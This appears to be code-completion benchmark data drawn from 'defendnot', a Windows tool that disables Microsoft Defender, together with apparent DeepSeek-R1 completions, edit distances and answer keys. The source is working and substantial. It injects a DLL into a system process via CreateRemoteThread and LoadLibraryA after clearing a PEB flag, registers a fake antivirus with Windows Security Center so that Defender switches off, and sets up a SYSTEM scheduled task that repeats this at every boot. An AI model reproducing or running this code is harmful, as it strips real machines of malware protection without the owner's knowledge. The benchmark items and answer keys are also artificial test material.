reg_info->put_Author(bstr_t(strings::kRepoUrl.data()));\n\n            /// Start even if we're on batteries\n            settings->put_DisallowStartIfOnBatteries(VARIANT_FALSE);\n            settings->put_StopIfGoingOnBatteries(VARIANT_FALSE);\n\n            /// Binary\n            exec_action->put_Path(bstr_t(bin_path.string().c_str()));\n            exec_action->put_Arguments(bstr_t(\"--from-autorun\"));\n\n            /// Register the task and we are done\n            com::Ptr<IRegisteredTask> registered_task;\n            hr = folder->RegisterTaskDefinition(bstr_t(kTaskName.data()), task.get(), TASK_CREATE_OR_UPDATE, VARIANT{}, VARIANT{}, TASK_LOGON_NONE,\n                                                variant_t(L\"\"), registered_task.ref_to_ptr());\n            return SUCCEEDED(hr);\n        });\n    }\n\n    [[nodiscard]] bool remove_from_autorun() {\n        return with_service([]<typename... TArgs>(TArgs...) -> bool { return true; });\n    }\n} // namespace loader\n"], ["/defendnot/defendnot/dllmain.cpp", "#include \"bootstrap/bootstrap.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ipc.hpp\"\n\n#include <stdexcept>\n#include <thread>\n\n#include <Windows.h>\n\nnamespace {\n    void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n\n        try {\n            /// Open IPC handle\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n\n            /// Invoke the real entry\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n\n        /// Always free out module once we are done\n        FreeLibraryAndExitThread(base, 0);\n    }\n} // namespace\n\nBOOL __stdcall DllMain(HINSTANCE base, std::uint32_t call_reason, LPVOID reserved) {\n    if (call_reason != DLL_PROCESS_ATTACH) {\n        return TRUE;\n    }\n\n    const auto th = CreateThread(nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(entry_thread), base, 0, nullptr);\n    if (th != nullptr) {\n        CloseHandle(th);\n    }\n\n    return TRUE;\n}\n"], ["/defendnot/defendnot/bootstrap/bootstrap.cpp", "#include \"bootstrap.hpp\"\n#include \"core/com.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n\n#include <Windows.h>\n\nnamespace defendnot {\n    namespace {\n        template <com::ComObject Ty>\n        void apply(const std::string_view log_prefix, const BSTR name) {\n            /// Get the WSC interface\n            auto inst = com::query<Ty>();\n\n            /// This can fail if we dont have any products registered so no com_checked\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n\n            /// Register and activate\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n\n            /// Update the substatuses, if the interface supports this\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, com::checked(inst->UpdateSettingsSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_prot_update: {:#x}\", log_prefix, com::checked(inst->UpdateProtectionUpdateSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n            }\n        }\n    } // namespace\n\n    void startup() {\n        /// Setup\n        shared::ctx.deserialize();\n        logln(\"init: {:#x}\", com::checked(CoInitialize(nullptr)));\n\n        /// WSC will reject the register request if name is empty\n        auto name_w = std::wstring(shared::ctx.name.begin(), shared::ctx.name.end());\n        if (name_w.empty()) {\n            throw std::runtime_error(\"AV Name can not be empty!\");\n        }\n\n        /// Convert to BSTR\n        auto name = SysAllocString(name_w.c_str());\n        defer->void {\n            SysFreeString(name);\n        };\n\n        /// Register our stuff in the WSC interfaces\n        apply<IWscASStatus>(\"IWscASStatus\", name);\n        apply<IWscAVStatus4>(\"IWscAVStatus4\", name);\n    }\n} // namespace defendnot\n"], ["/defendnot/defendnot-loader/core/ensure_environment.cpp", "#include \"core/core.hpp\"\n#include \"shared/strings.hpp\"\n#include \"util/scm.hpp\"\n\n#include <format>\n#include <print>\n#include <stdexcept>\n\nnamespace loader {\n    void ensure_environment() {\n        auto manager = scm::Manager();\n        if (!manager.valid()) [[unlikely]] {\n            throw std::runtime_error(\"Unable to open scm::Manager\");\n        }\n\n        auto service = manager.get_service(L\"wscsvc\");\n        if (!service.valid() || !service.query_status()) {\n            throw std::runtime_error(std::format(\"{}\\nOpen error: {}\", strings::wsc_unavailable_error().data(), GetLastError()));\n        }\n\n        if (service.state() == scm::ServiceState::RUNNING) {\n            /// Wsc service has been already started, no need to start it ourselves\n            return;\n        }\n\n        /// Let's start the service ourselves\n        std::println(\"** wscsvc is not running, starting it..\");\n        if (!service.start()) {\n            throw std::runtime_error(std::format(\"{}\\nTried to start the service, but go an error: {}\", strings::wsc_unavailable_error(), GetLastError()));\n        }\n\n        std::println(\"** successfully started the service, waiting for it to get up..\");\n        while (true) {\n            if (!service.query_status(/*force=*/true)) {\n                throw std::runtime_error(\n                    std::format(\"{}\\nStarted the service, got an error while querying: {}\", strings::wsc_unavailable_error(), GetLastError()));\n            }\n\n            if (const auto state = service.state(); state == scm::ServiceState::RUNNING) {\n                std::println(\"** we are good to go\");\n                return;\n            }\n\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n    }\n} // namespace loader\n"]], "task_instance_info": {"created_time": "2025-08-20 19:54:23", "created_task_model": "DeepSeek-R1", "function_skeleton": "[[nodiscard]] bool check_signature(const std::filesystem::path path) {}", "code_description": "This code segment functions to: Verify the digital signature of a file using cryptographic system interfaces and validate the authenticity of its certificate chain."}, "inference_content": {"inference_model": "DeepSeek-R1", "inference_result": "```cpp\n[TASK_BEGIN]\n[[nodiscard]] bool check_signature(const std::filesystem::path path) {\n    WINTRUST_FILE_INFO fileInfo{};\n    fileInfo.cbStruct = sizeof(WINTRUST_FILE_INFO);\n    fileInfo.pcwszFilePath = path.c_str();\n\n    WINTRUST_DATA winTrustData{};\n    winTrustData.cbStruct = sizeof(WINTRUST_DATA);\n    winTrustData.dwUIChoice = WTD_UI_NONE;\n    winTrustData.dwUnionChoice = WTD_CHOICE_FILE;\n    winTrustData.pFile = &fileInfo;\n    winTrustData.dwStateAction = WTD_STATEACTION_IGNORE;\n\n    const GUID action = WINTRUST_ACTION_GENERIC_VERIFY_V2;\n    const LONG status = ::WinVerifyTrust(nullptr, &action, &winTrustData);\n    \n    return status == ERROR_SUCCESS;\n}\n[TASK_END]\n```", "inference_time": "2025-08-20 19-55-44"}, "editdistance_info": {"edit_distance": 10.396, "calculate_time": "2025-08-20 19:55:44", "true_code_clean": "[[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) \n            || !store || !msg) {\n            return false;\n        }\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n        return true;\n    }", "predict_code_clean": "[[nodiscard]] bool check_signature(const std::filesystem::path path) {\n    WINTRUST_FILE_INFO fileInfo{};\n    fileInfo.cbStruct = sizeof(WINTRUST_FILE_INFO);\n    fileInfo.pcwszFilePath = path.c_str();\n    WINTRUST_DATA winTrustData{};\n    winTrustData.cbStruct = sizeof(WINTRUST_DATA);\n    winTrustData.dwUIChoice = WTD_UI_NONE;\n    winTrustData.dwUnionChoice = WTD_CHOICE_FILE;\n    winTrustData.pFile = &fileInfo;\n    winTrustData.dwStateAction = WTD_STATEACTION_IGNORE;\n    const GUID action = WINTRUST_ACTION_GENERIC_VERIFY_V2;\n    const LONG status = ::WinVerifyTrust(nullptr, &action, &winTrustData);\n    return status == ERROR_SUCCESS;\n}"}}
{"repo_name": "defendnot", "file_name": "/defendnot/defendnot-loader/core/inject.cpp", "inference_info": {"prefix_code": "#include \"core/core.hpp\"\n\n#include \"shared/defer.hpp\"\n#include \"shared/native.hpp\"\n\n#include <print>\n#include <stdexcept>\n\n#include <Windows.h>\n\nnamespace loader {\n    ", "suffix_code": "\n} // namespace loader\n", "middle_code": "[[nodiscard]] HANDLE inject(std::string_view dll_path, std::string_view proc_name) {\n        STARTUPINFOA si = {\n            .cb = sizeof(si),\n        };\n        PROCESS_INFORMATION pi = {\n            0,\n        };\n        SECURITY_ATTRIBUTES sa = {\n            .nLength = sizeof(sa),\n            .bInheritHandle = TRUE,\n        };\n        native::get_peb()->read_image_file_exec_options = 0;\n        std::println(\"** booting {}\", proc_name);\n        const auto process_flags = CREATE_SUSPENDED | DEBUG_PROCESS | DEBUG_ONLY_THIS_PROCESS;\n        if (!CreateProcessA(nullptr, const_cast<char*>(proc_name.data()), &sa, &sa, FALSE, process_flags, nullptr, nullptr, &si, &pi)) {\n            throw std::runtime_error(std::format(\"unable to create process: {}\", GetLastError()));\n        }\n        native::debug_set_process_kill_on_exit(false);\n        native::debug_active_process_stop(pi.dwProcessId);\n        defer->void {\n            CloseHandle(pi.hThread);\n        };\n        LPVOID mem = VirtualAllocEx(pi.hProcess, nullptr, dll_path.size() + 1, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (mem == nullptr) {\n            throw std::runtime_error(std::format(\"unable to allocate memory: {}\", GetLastError()));\n        }\n        defer->void {\n            VirtualFreeEx(pi.hProcess, mem, 0, MEM_RELEASE);\n        };\n        if (!WriteProcessMemory(pi.hProcess, mem, dll_path.data(), dll_path.size() + 1, nullptr)) {\n            throw std::runtime_error(std::format(\"unable to write memory: {}\", GetLastError()));\n        }\n        HANDLE thread = CreateRemoteThread(pi.hProcess, nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(LoadLibraryA), mem, 0, nullptr);\n        if (thread == NULL) {\n            throw std::runtime_error(std::format(\"unable to create thread: {}\", GetLastError()));\n        }\n        defer->void {\n            CloseHandle(thread);\n        };\n        WaitForSingleObject(thread, INFINITE);\n        return pi.hProcess;\n    }", "code_description": null, "fill_type": "FUNCTION_TYPE", "language_type": "cpp", "sub_task_type": null}, "context_code": [["/defendnot/wsc-binary-check/main.cpp", "#include <Windows.h>\n#include <winternl.h>\n\n#include <filesystem>\n#include <fstream>\n#include <optional>\n#include <print>\n#include <ranges>\n#include <set>\n\n#include \"shared/defer.hpp\"\n\n#pragma comment(lib, \"Crypt32.lib\")\n\nnamespace {\n    constexpr std::string_view kTargetDirectory = \"c:\\\\Windows\\\\System32\";\n    /* constexpr */ auto kTargetFileExts = std::set<std::string_view>{\".exe\"};\n\n    constexpr std::uint16_t kDosMagic = 0x5A4D;\n    constexpr std::uint32_t kNtSignature = 0x00004550;\n    constexpr std::uint16_t kARM64Machine = 0xAA64;\n    constexpr std::uint16_t kAMD64Machine = 0x8664;\n    constexpr std::uint16_t kI386Machine = 0x014C;\n    constexpr std::uint16_t kDllCharacteristicsForceIntegrityMask = 0x80;\n\n    [[nodiscard]] std::optional<std::vector<std::uint8_t>> read_file(const std::filesystem::path path) {\n        std::ifstream file(path, std::ios::binary);\n        if (!file.good()) {\n            return std::nullopt;\n        }\n\n        const auto size = std::filesystem::file_size(path);\n        std::vector<std::uint8_t> buffer(size);\n\n        file.read(reinterpret_cast<char*>(buffer.data()), static_cast<std::streamsize>(buffer.size()));\n        return buffer;\n    }\n\n    [[nodiscard]] bool check_characteristics(const std::span<std::uint8_t> data) {\n        if (data.size() < sizeof(IMAGE_DOS_HEADER)) {\n            throw std::runtime_error(\"got invalid pe image\");\n        }\n\n        const auto p_dos = reinterpret_cast<PIMAGE_DOS_HEADER>(data.data());\n        if (p_dos->e_magic != kDosMagic) {\n            throw std::runtime_error(\"got invalid pe image (2)\");\n        }\n\n        const auto p_nt = reinterpret_cast<PIMAGE_NT_HEADERS>(data.data() + p_dos->e_lfanew);\n        if (p_nt->Signature != kNtSignature) {\n            throw std::runtime_error(\"got invalid pe image (3)\");\n        }\n\n        const auto machine = p_nt->FileHeader.Machine;\n        std::uint16_t characteristics;\n\n        if (machine == kARM64Machine || machine == kAMD64Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS64>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else if (machine == kI386Machine) {\n            characteristics = reinterpret_cast<PIMAGE_NT_HEADERS32>(p_nt)->OptionalHeader.DllCharacteristics;\n        } else {\n            throw std::runtime_error(std::format(\"unsupported machine: {:#x}\", machine));\n        }\n\n        return (characteristics & kDllCharacteristicsForceIntegrityMask) != 0;\n    }\n\n    [[nodiscard]] bool check_signature(const std::filesystem::path path) {\n        HCERTSTORE store = {0};\n        HCRYPTMSG msg = {0};\n        if (!CryptQueryObject(1, path.wstring().c_str(), 0x400, 0xE, 0, nullptr, nullptr, nullptr, &store, &msg, nullptr) //\n            || !store || !msg) {\n            /// Most likely the binary is just not signed\n            return false;\n        }\n\n        defer->void {\n            CryptMsgClose(msg);\n            CertCloseStore(store, 1);\n        };\n\n        PCCERT_CONTEXT signer = nullptr;\n        if (!CryptMsgGetAndVerifySigner(msg, 0, nullptr, 2, &signer, nullptr) || signer == nullptr) {\n            throw std::runtime_error(std::format(\"CryptMsgGetAndVerifySigner() on {}\", path.string()));\n        }\n\n        defer->void {\n            CertFreeCertificateContext(signer);\n        };\n\n        /// I don't think we have to do something with signer?\n        return true;\n    }\n} // namespace\n\nint main() try {\n    for (auto& entry : std::filesystem::recursive_directory_iterator(kTargetDirectory, std::filesystem::directory_options::skip_permission_denied)) {\n        auto path = entry.path();\n        auto ext = path.extension().string() //\n                   | std::views::transform([](const char c) -> char { return ::tolower(c); }) //\n                   | std::ranges::to<std::string>();\n\n        if (!kTargetFileExts.contains(ext)) {\n            continue;\n        }\n\n        auto file = read_file(path);\n        if (!file.has_value()) {\n            std::println(stderr, \"unable to read {}\", path.string());\n            continue;\n        }\n\n        const std::span file_ptr = *file;\n        if (!check_characteristics(file_ptr)) {\n            continue;\n        }\n\n        if (!check_signature(path)) {\n            continue;\n        }\n\n        std::println(\"matches: {}\", path.string());\n    }\n\n    return EXIT_SUCCESS;\n} catch (const std::exception& e) {\n    std::println(stderr, \"fatal error: {}\", e.what());\n    return EXIT_FAILURE;\n}\n"], ["/defendnot/defendnot-loader/main.cpp", "#include \"core/core.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n#include \"shared/ipc.hpp\"\n#include \"shared/strings.hpp\"\n#include <argparse/argparse.hpp>\n\n#include <format>\n#include <print>\n#include <thread>\n\nnamespace {\n    void setup_window(const loader::Config& config) {\n        if ((!config.from_autorun || config.verbose) && config.alloc_console) {\n            shared::alloc_console();\n        }\n    }\n\n    void setup_context(const loader::Config& config) {\n        std::println(\"** setting up context\");\n\n        if (config.name.length() > shared::kMaxNameLength) {\n            throw std::runtime_error(std::format(\"Max name length is {} characters\", shared::kMaxNameLength));\n        }\n\n        shared::ctx.state = config.disable ? shared::State::OFF : shared::State::ON;\n        shared::ctx.verbose = config.verbose;\n        std::ranges::copy(config.name, shared::ctx.name.data());\n\n        /// No need to overwrite ctx if we are called from autorun\n        if (!config.from_autorun) {\n            std::println(\"** overwriting ctx.bin\");\n            shared::ctx.serialize();\n        }\n    }\n\n    [[nodiscard]] HANDLE load_defendnot() {\n        std::println(\"** loading defendnot\");\n\n        auto dll_path = shared::get_this_module_path().parent_path();\n        dll_path /= strings::kDllName;\n        if (!std::filesystem::exists(dll_path)) {\n            throw std::runtime_error(std::format(\"{} does not exist!\", strings::kDllName));\n        }\n\n        return loader::inject(dll_path.string(), strings::kVictimProcess);\n    }\n\n    void wait_for_finish(shared::InterProcessCommunication& ipc) {\n        std::println(\"** waiting for process to finish, this can take a while\");\n        std::cout << std::flush;\n        while (!ipc->finished) {\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n        std::println(\"** success: {}\", ipc->success);\n    }\n\n    void process_autorun(const loader::Config& config) {\n        if (shared::ctx.state == shared::State::ON && config.enable_autorun) {\n            std::println(\"** added to autorun: {}\", loader::add_to_autorun(config.autorun_type));\n        } else {\n            std::println(\"** removed from autorun: {}\", loader::remove_from_autorun());\n        }\n    }\n\n    void banner(const loader::Config& config) {\n        std::println();\n        std::println(\"thanks for using {}\", strings::kProjectName);\n        std::println(\"please don't forget to leave a star at {}\", strings::kRepoUrl);\n\n        if (!config.from_autorun && config.alloc_console) {\n            system(\"pause\");\n        }\n    }\n} // namespace\n\nint main(int argc, char* argv[]) try {\n    argparse::ArgumentParser program(std::format(\"{}-loader\", strings::kProjectName), strings::kVersion.data(), argparse::default_arguments::none);\n\n    const auto fatal_print = [](const std::string_view str) -> void {\n        shared::alloc_console();\n        std::cerr << str << std::endl;\n        system(\"pause\");\n        std::exit(EXIT_FAILURE);\n    };\n\n    /// We are registering these ourselves because we have to alloc console first\n    program.add_argument(\"-h\", \"--help\")\n        .help(\"prints help message and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print, &program](const auto& /*unused*/) -> void { fatal_print(program.help().str()); });\n    program.add_argument(\"--version\")\n        .help(\"shows version and exits\")\n        .default_value(false)\n        .implicit_value(true)\n        .action([&fatal_print](const auto& /*unused*/) -> void { fatal_print(std::format(\"{}-loader v{}\", strings::kProjectName, strings::kVersion)); });\n\n    /// defendnot-loader parameters:\n    program.add_argument(\"-n\", \"--name\").help(\"av display name\").default_value(std::string(strings::kDefaultAVName)).nargs(1);\n    program.add_argument(\"-d\", \"--disable\").help(std::format(\"disable {}\", strings::kProjectName)).default_value(false).implicit_value(true);\n    program.add_argument(\"-v\", \"--verbose\").help(\"verbose logging\").default_value(false).implicit_value(true);\n    program.add_argument(\"--silent\").help(\"do not allocate console\").default_value(false).implicit_value(true);\n    program.add_argument(\"--autorun-as-user\").help(\"create autorun task as currently logged in user\").default_value(false).implicit_value(true);\n    program.add_argument(\"--disable-autorun\").help(\"disable autorun task creation\").default_value(false).implicit_value(true);\n    program.add_argument(\"--from-autorun\").hidden().default_value(false).implicit_value(true);\n\n    try {\n        program.parse_args(argc, argv);\n    } catch (std::exception& e) {\n        std::stringstream ss;\n        ss << e.what() << '\\n';\n        ss << program.help().str();\n        fatal_print(ss.str());\n        return EXIT_FAILURE;\n    }\n\n    auto config = loader::Config{\n        .name = program.get<std::string>(\"-n\"),\n        .disable = program.get<bool>(\"-d\"),\n        .alloc_console = !program.get<bool>(\"--silent\"),\n        .verbose = program.get<bool>(\"-v\"),\n        .from_autorun = program.get<bool>(\"--from-autorun\"),\n        .autorun_type = program.get<bool>(\"--autorun-as-user\") ? /// As system on boot is the default value\n                            loader::AutorunType::AS_CURRENT_USER_ON_LOGIN :\n                            loader::AutorunType::AS_SYSTEM_ON_BOOT,\n        .enable_autorun = !program.get<bool>(\"--disable-autorun\"),\n    };\n\n    /// When running from autorun, we'll be missing all the cli arguments, so lets load some relevant ones\n    if (config.from_autorun) {\n        shared::ctx.deserialize();\n        config.verbose = shared::ctx.verbose;\n    }\n\n    if (!config.alloc_console && config.verbose) {\n        fatal_print(\"--silent flag can not be used in combination with --verbose\");\n    }\n\n    setup_window(config);\n    loader::ensure_environment();\n\n    setup_context(config);\n\n    /// \\todo @es3n1n: move this to a separate function and add move ctor for ipc\n    std::println(\"** setting up ipc\");\n    auto ipc = shared::InterProcessCommunication(shared::InterProcessCommunicationMode::READ_WRITE, true);\n    ipc->finished = false;\n\n    const auto process = load_defendnot();\n    defer->void {\n        TerminateProcess(process, 0);\n    };\n\n    wait_for_finish(ipc);\n\n    /// Only create autorun task when not running from autorun, no need to recreate it because we're missing some config vars\n    if (!config.from_autorun) {\n        process_autorun(config);\n    }\n\n    banner(config);\n\n    return EXIT_SUCCESS;\n} catch (std::exception& err) {\n    shared::alloc_console();\n    std::println(stderr, \"** fatal error: {}\", err.what());\n    system(\"pause\");\n    return EXIT_FAILURE;\n}\n\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR lpCmdLine, int nCmdShow) {\n    return main(__argc, __argv);\n}\n"], ["/defendnot/defendnot/dllmain.cpp", "#include \"bootstrap/bootstrap.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ipc.hpp\"\n\n#include <stdexcept>\n#include <thread>\n\n#include <Windows.h>\n\nnamespace {\n    void entry_thread(HMODULE base) {\n        bool success = false;\n        std::unique_ptr<shared::InterProcessCommunication> ipc;\n\n        try {\n            /// Open IPC handle\n            ipc = std::make_unique<shared::InterProcessCommunication>(shared::InterProcessCommunicationMode::WRITE);\n\n            /// Invoke the real entry\n            defendnot::startup();\n            success = true;\n        } catch (std::exception& err) {\n            MessageBoxA(nullptr, err.what(), \"defendnot\", MB_TOPMOST | MB_ICONERROR);\n        }\n\n        if (ipc) {\n            (*ipc)->success = success;\n            (*ipc)->finished = true;\n        }\n\n        /// Always free out module once we are done\n        FreeLibraryAndExitThread(base, 0);\n    }\n} // namespace\n\nBOOL __stdcall DllMain(HINSTANCE base, std::uint32_t call_reason, LPVOID reserved) {\n    if (call_reason != DLL_PROCESS_ATTACH) {\n        return TRUE;\n    }\n\n    const auto th = CreateThread(nullptr, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(entry_thread), base, 0, nullptr);\n    if (th != nullptr) {\n        CloseHandle(th);\n    }\n\n    return TRUE;\n}\n"], ["/defendnot/defendnot-loader/core/ensure_environment.cpp", "#include \"core/core.hpp\"\n#include \"shared/strings.hpp\"\n#include \"util/scm.hpp\"\n\n#include <format>\n#include <print>\n#include <stdexcept>\n\nnamespace loader {\n    void ensure_environment() {\n        auto manager = scm::Manager();\n        if (!manager.valid()) [[unlikely]] {\n            throw std::runtime_error(\"Unable to open scm::Manager\");\n        }\n\n        auto service = manager.get_service(L\"wscsvc\");\n        if (!service.valid() || !service.query_status()) {\n            throw std::runtime_error(std::format(\"{}\\nOpen error: {}\", strings::wsc_unavailable_error().data(), GetLastError()));\n        }\n\n        if (service.state() == scm::ServiceState::RUNNING) {\n            /// Wsc service has been already started, no need to start it ourselves\n            return;\n        }\n\n        /// Let's start the service ourselves\n        std::println(\"** wscsvc is not running, starting it..\");\n        if (!service.start()) {\n            throw std::runtime_error(std::format(\"{}\\nTried to start the service, but go an error: {}\", strings::wsc_unavailable_error(), GetLastError()));\n        }\n\n        std::println(\"** successfully started the service, waiting for it to get up..\");\n        while (true) {\n            if (!service.query_status(/*force=*/true)) {\n                throw std::runtime_error(\n                    std::format(\"{}\\nStarted the service, got an error while querying: {}\", strings::wsc_unavailable_error(), GetLastError()));\n            }\n\n            if (const auto state = service.state(); state == scm::ServiceState::RUNNING) {\n                std::println(\"** we are good to go\");\n                return;\n            }\n\n            std::this_thread::sleep_for(std::chrono::milliseconds(500));\n        }\n    }\n} // namespace loader\n"], ["/defendnot/defendnot-loader/core/autorun.cpp", "#include \"core/core.hpp\"\n\n#include \"shared/com.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/strings.hpp\"\n\n#include <memory>\n#include <print>\n#include <stdexcept>\n#include <type_traits>\n\n#include <comdef.h>\n#include <taskschd.h>\n\n#pragma comment(lib, \"taskschd.lib\")\n#pragma comment(lib, \"comsupp.lib\")\n#pragma comment(lib, \"ole32.lib\")\n\nnamespace loader {\n    namespace {\n        constexpr std::string_view kTaskName = strings::kProjectName;\n\n        void co_initialize() {\n            static std::once_flag fl;\n            std::call_once(fl, []() -> void {\n                const auto result = CoInitializeEx(nullptr, COINIT_MULTITHREADED);\n\n                if (FAILED(result)) {\n                    throw std::runtime_error(\"failed to CoInitializeEx\");\n                }\n            });\n        }\n\n        template <typename Callable>\n        [[nodiscard]] bool with_service(Callable&& callback) {\n            co_initialize();\n\n            com::Ptr<ITaskService> service;\n            auto hr =\n                CoCreateInstance(CLSID_TaskScheduler, nullptr, CLSCTX_INPROC_SERVER, IID_ITaskService, reinterpret_cast<void**>(service.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            hr = service->Connect(VARIANT{}, VARIANT{}, VARIANT{}, VARIANT{});\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskFolder> root_folder;\n            hr = service->GetFolder(BSTR(L\"\\\\\"), root_folder.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Cleanup our task, we will recreate it in the callback if needed\n            root_folder->DeleteTask(BSTR(kTaskName.data()), 0);\n            return callback(service.get(), root_folder.get());\n        }\n    } // namespace\n\n    [[nodiscard]] bool add_to_autorun(AutorunType type) {\n        const auto bin_path = shared::get_this_module_path();\n\n        return with_service([bin_path, type](ITaskService* service, ITaskFolder* folder) -> bool {\n            /// Deduce the autorun config based on type\n            const auto task_trigger = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_TRIGGER_BOOT : TASK_TRIGGER_LOGON;\n            const auto logon_type = type == AutorunType::AS_SYSTEM_ON_BOOT ? TASK_LOGON_SERVICE_ACCOUNT : TASK_LOGON_INTERACTIVE_TOKEN;\n\n            BSTR user_id = nullptr;\n            auto bstr_sys = bstr_t(L\"SYSTEM\");\n            if (type == AutorunType::AS_SYSTEM_ON_BOOT) {\n                user_id = bstr_sys;\n            }\n\n            com::Ptr<ITaskDefinition> task;\n            auto hr = service->NewTask(0, task.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IRegistrationInfo> reg_info;\n            hr = task->get_RegistrationInfo(reg_info.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IPrincipal> principal;\n            hr = task->get_Principal(principal.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITriggerCollection> trigger_collection;\n            hr = task->get_Triggers(trigger_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITrigger> trigger;\n            hr = trigger_collection->Create(task_trigger, trigger.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IActionCollection> action_collection;\n            hr = task->get_Actions(action_collection.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IAction> action;\n            hr = action_collection->Create(TASK_ACTION_EXEC, action.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<IExecAction> exec_action;\n            hr = action->QueryInterface(IID_IExecAction, reinterpret_cast<void**>(exec_action.ref_to_ptr()));\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            com::Ptr<ITaskSettings> settings;\n            hr = task->get_Settings(settings.ref_to_ptr());\n            if (FAILED(hr)) {\n                return false;\n            }\n\n            /// Elevated, when system boots\n            principal->put_UserId(user_id);\n            principal->put_LogonType(logon_type);\n            principal->put_RunLevel(TASK_RUNLEVEL_HIGHEST);\n\n            /// Info\n            reg_info->put_Author(bstr_t(strings::kRepoUrl.data()));\n\n            /// Start even if we're on batteries\n            settings->put_DisallowStartIfOnBatteries(VARIANT_FALSE);\n            settings->put_StopIfGoingOnBatteries(VARIANT_FALSE);\n\n            /// Binary\n            exec_action->put_Path(bstr_t(bin_path.string().c_str()));\n            exec_action->put_Arguments(bstr_t(\"--from-autorun\"));\n\n            /// Register the task and we are done\n            com::Ptr<IRegisteredTask> registered_task;\n            hr = folder->RegisterTaskDefinition(bstr_t(kTaskName.data()), task.get(), TASK_CREATE_OR_UPDATE, VARIANT{}, VARIANT{}, TASK_LOGON_NONE,\n                                                variant_t(L\"\"), registered_task.ref_to_ptr());\n            return SUCCEEDED(hr);\n        });\n    }\n\n    [[nodiscard]] bool remove_from_autorun() {\n        return with_service([]<typename... TArgs>(TArgs...) -> bool { return true; });\n    }\n} // namespace loader\n"], ["/defendnot/defendnot/bootstrap/bootstrap.cpp", "#include \"bootstrap.hpp\"\n#include \"core/com.hpp\"\n#include \"core/log.hpp\"\n#include \"shared/ctx.hpp\"\n#include \"shared/defer.hpp\"\n\n#include <Windows.h>\n\nnamespace defendnot {\n    namespace {\n        template <com::ComObject Ty>\n        void apply(const std::string_view log_prefix, const BSTR name) {\n            /// Get the WSC interface\n            auto inst = com::query<Ty>();\n\n            /// This can fail if we dont have any products registered so no com_checked\n            logln(\"{}_unregister: {:#x}\", log_prefix, com::retry_while_pending([&inst]() -> HRESULT { return inst->Unregister(); }) & 0xFFFFFFFF);\n            if (shared::ctx.state == shared::State::OFF) {\n                return;\n            }\n\n            /// Register and activate\n            logln(\"{}_register: {:#x}\", log_prefix, com::checked(inst->Register(name, name, 0, 0)));\n            logln(\"{}_update: {:#x}\", log_prefix, com::checked(inst->UpdateStatus(WSCSecurityProductState::ON, static_cast<BOOL>(true))));\n\n            /// Update the substatuses, if the interface supports this\n            if constexpr (std::is_same_v<Ty, IWscAVStatus4>) {\n                logln(\"{}_scan_update: {:#x}\", log_prefix, com::checked(inst->UpdateScanSubstatus(WSCSecurityProductSubStatus::NO_ACTION)));\n                logln(\"{}_settings_update: {:#x}\", log_prefix, 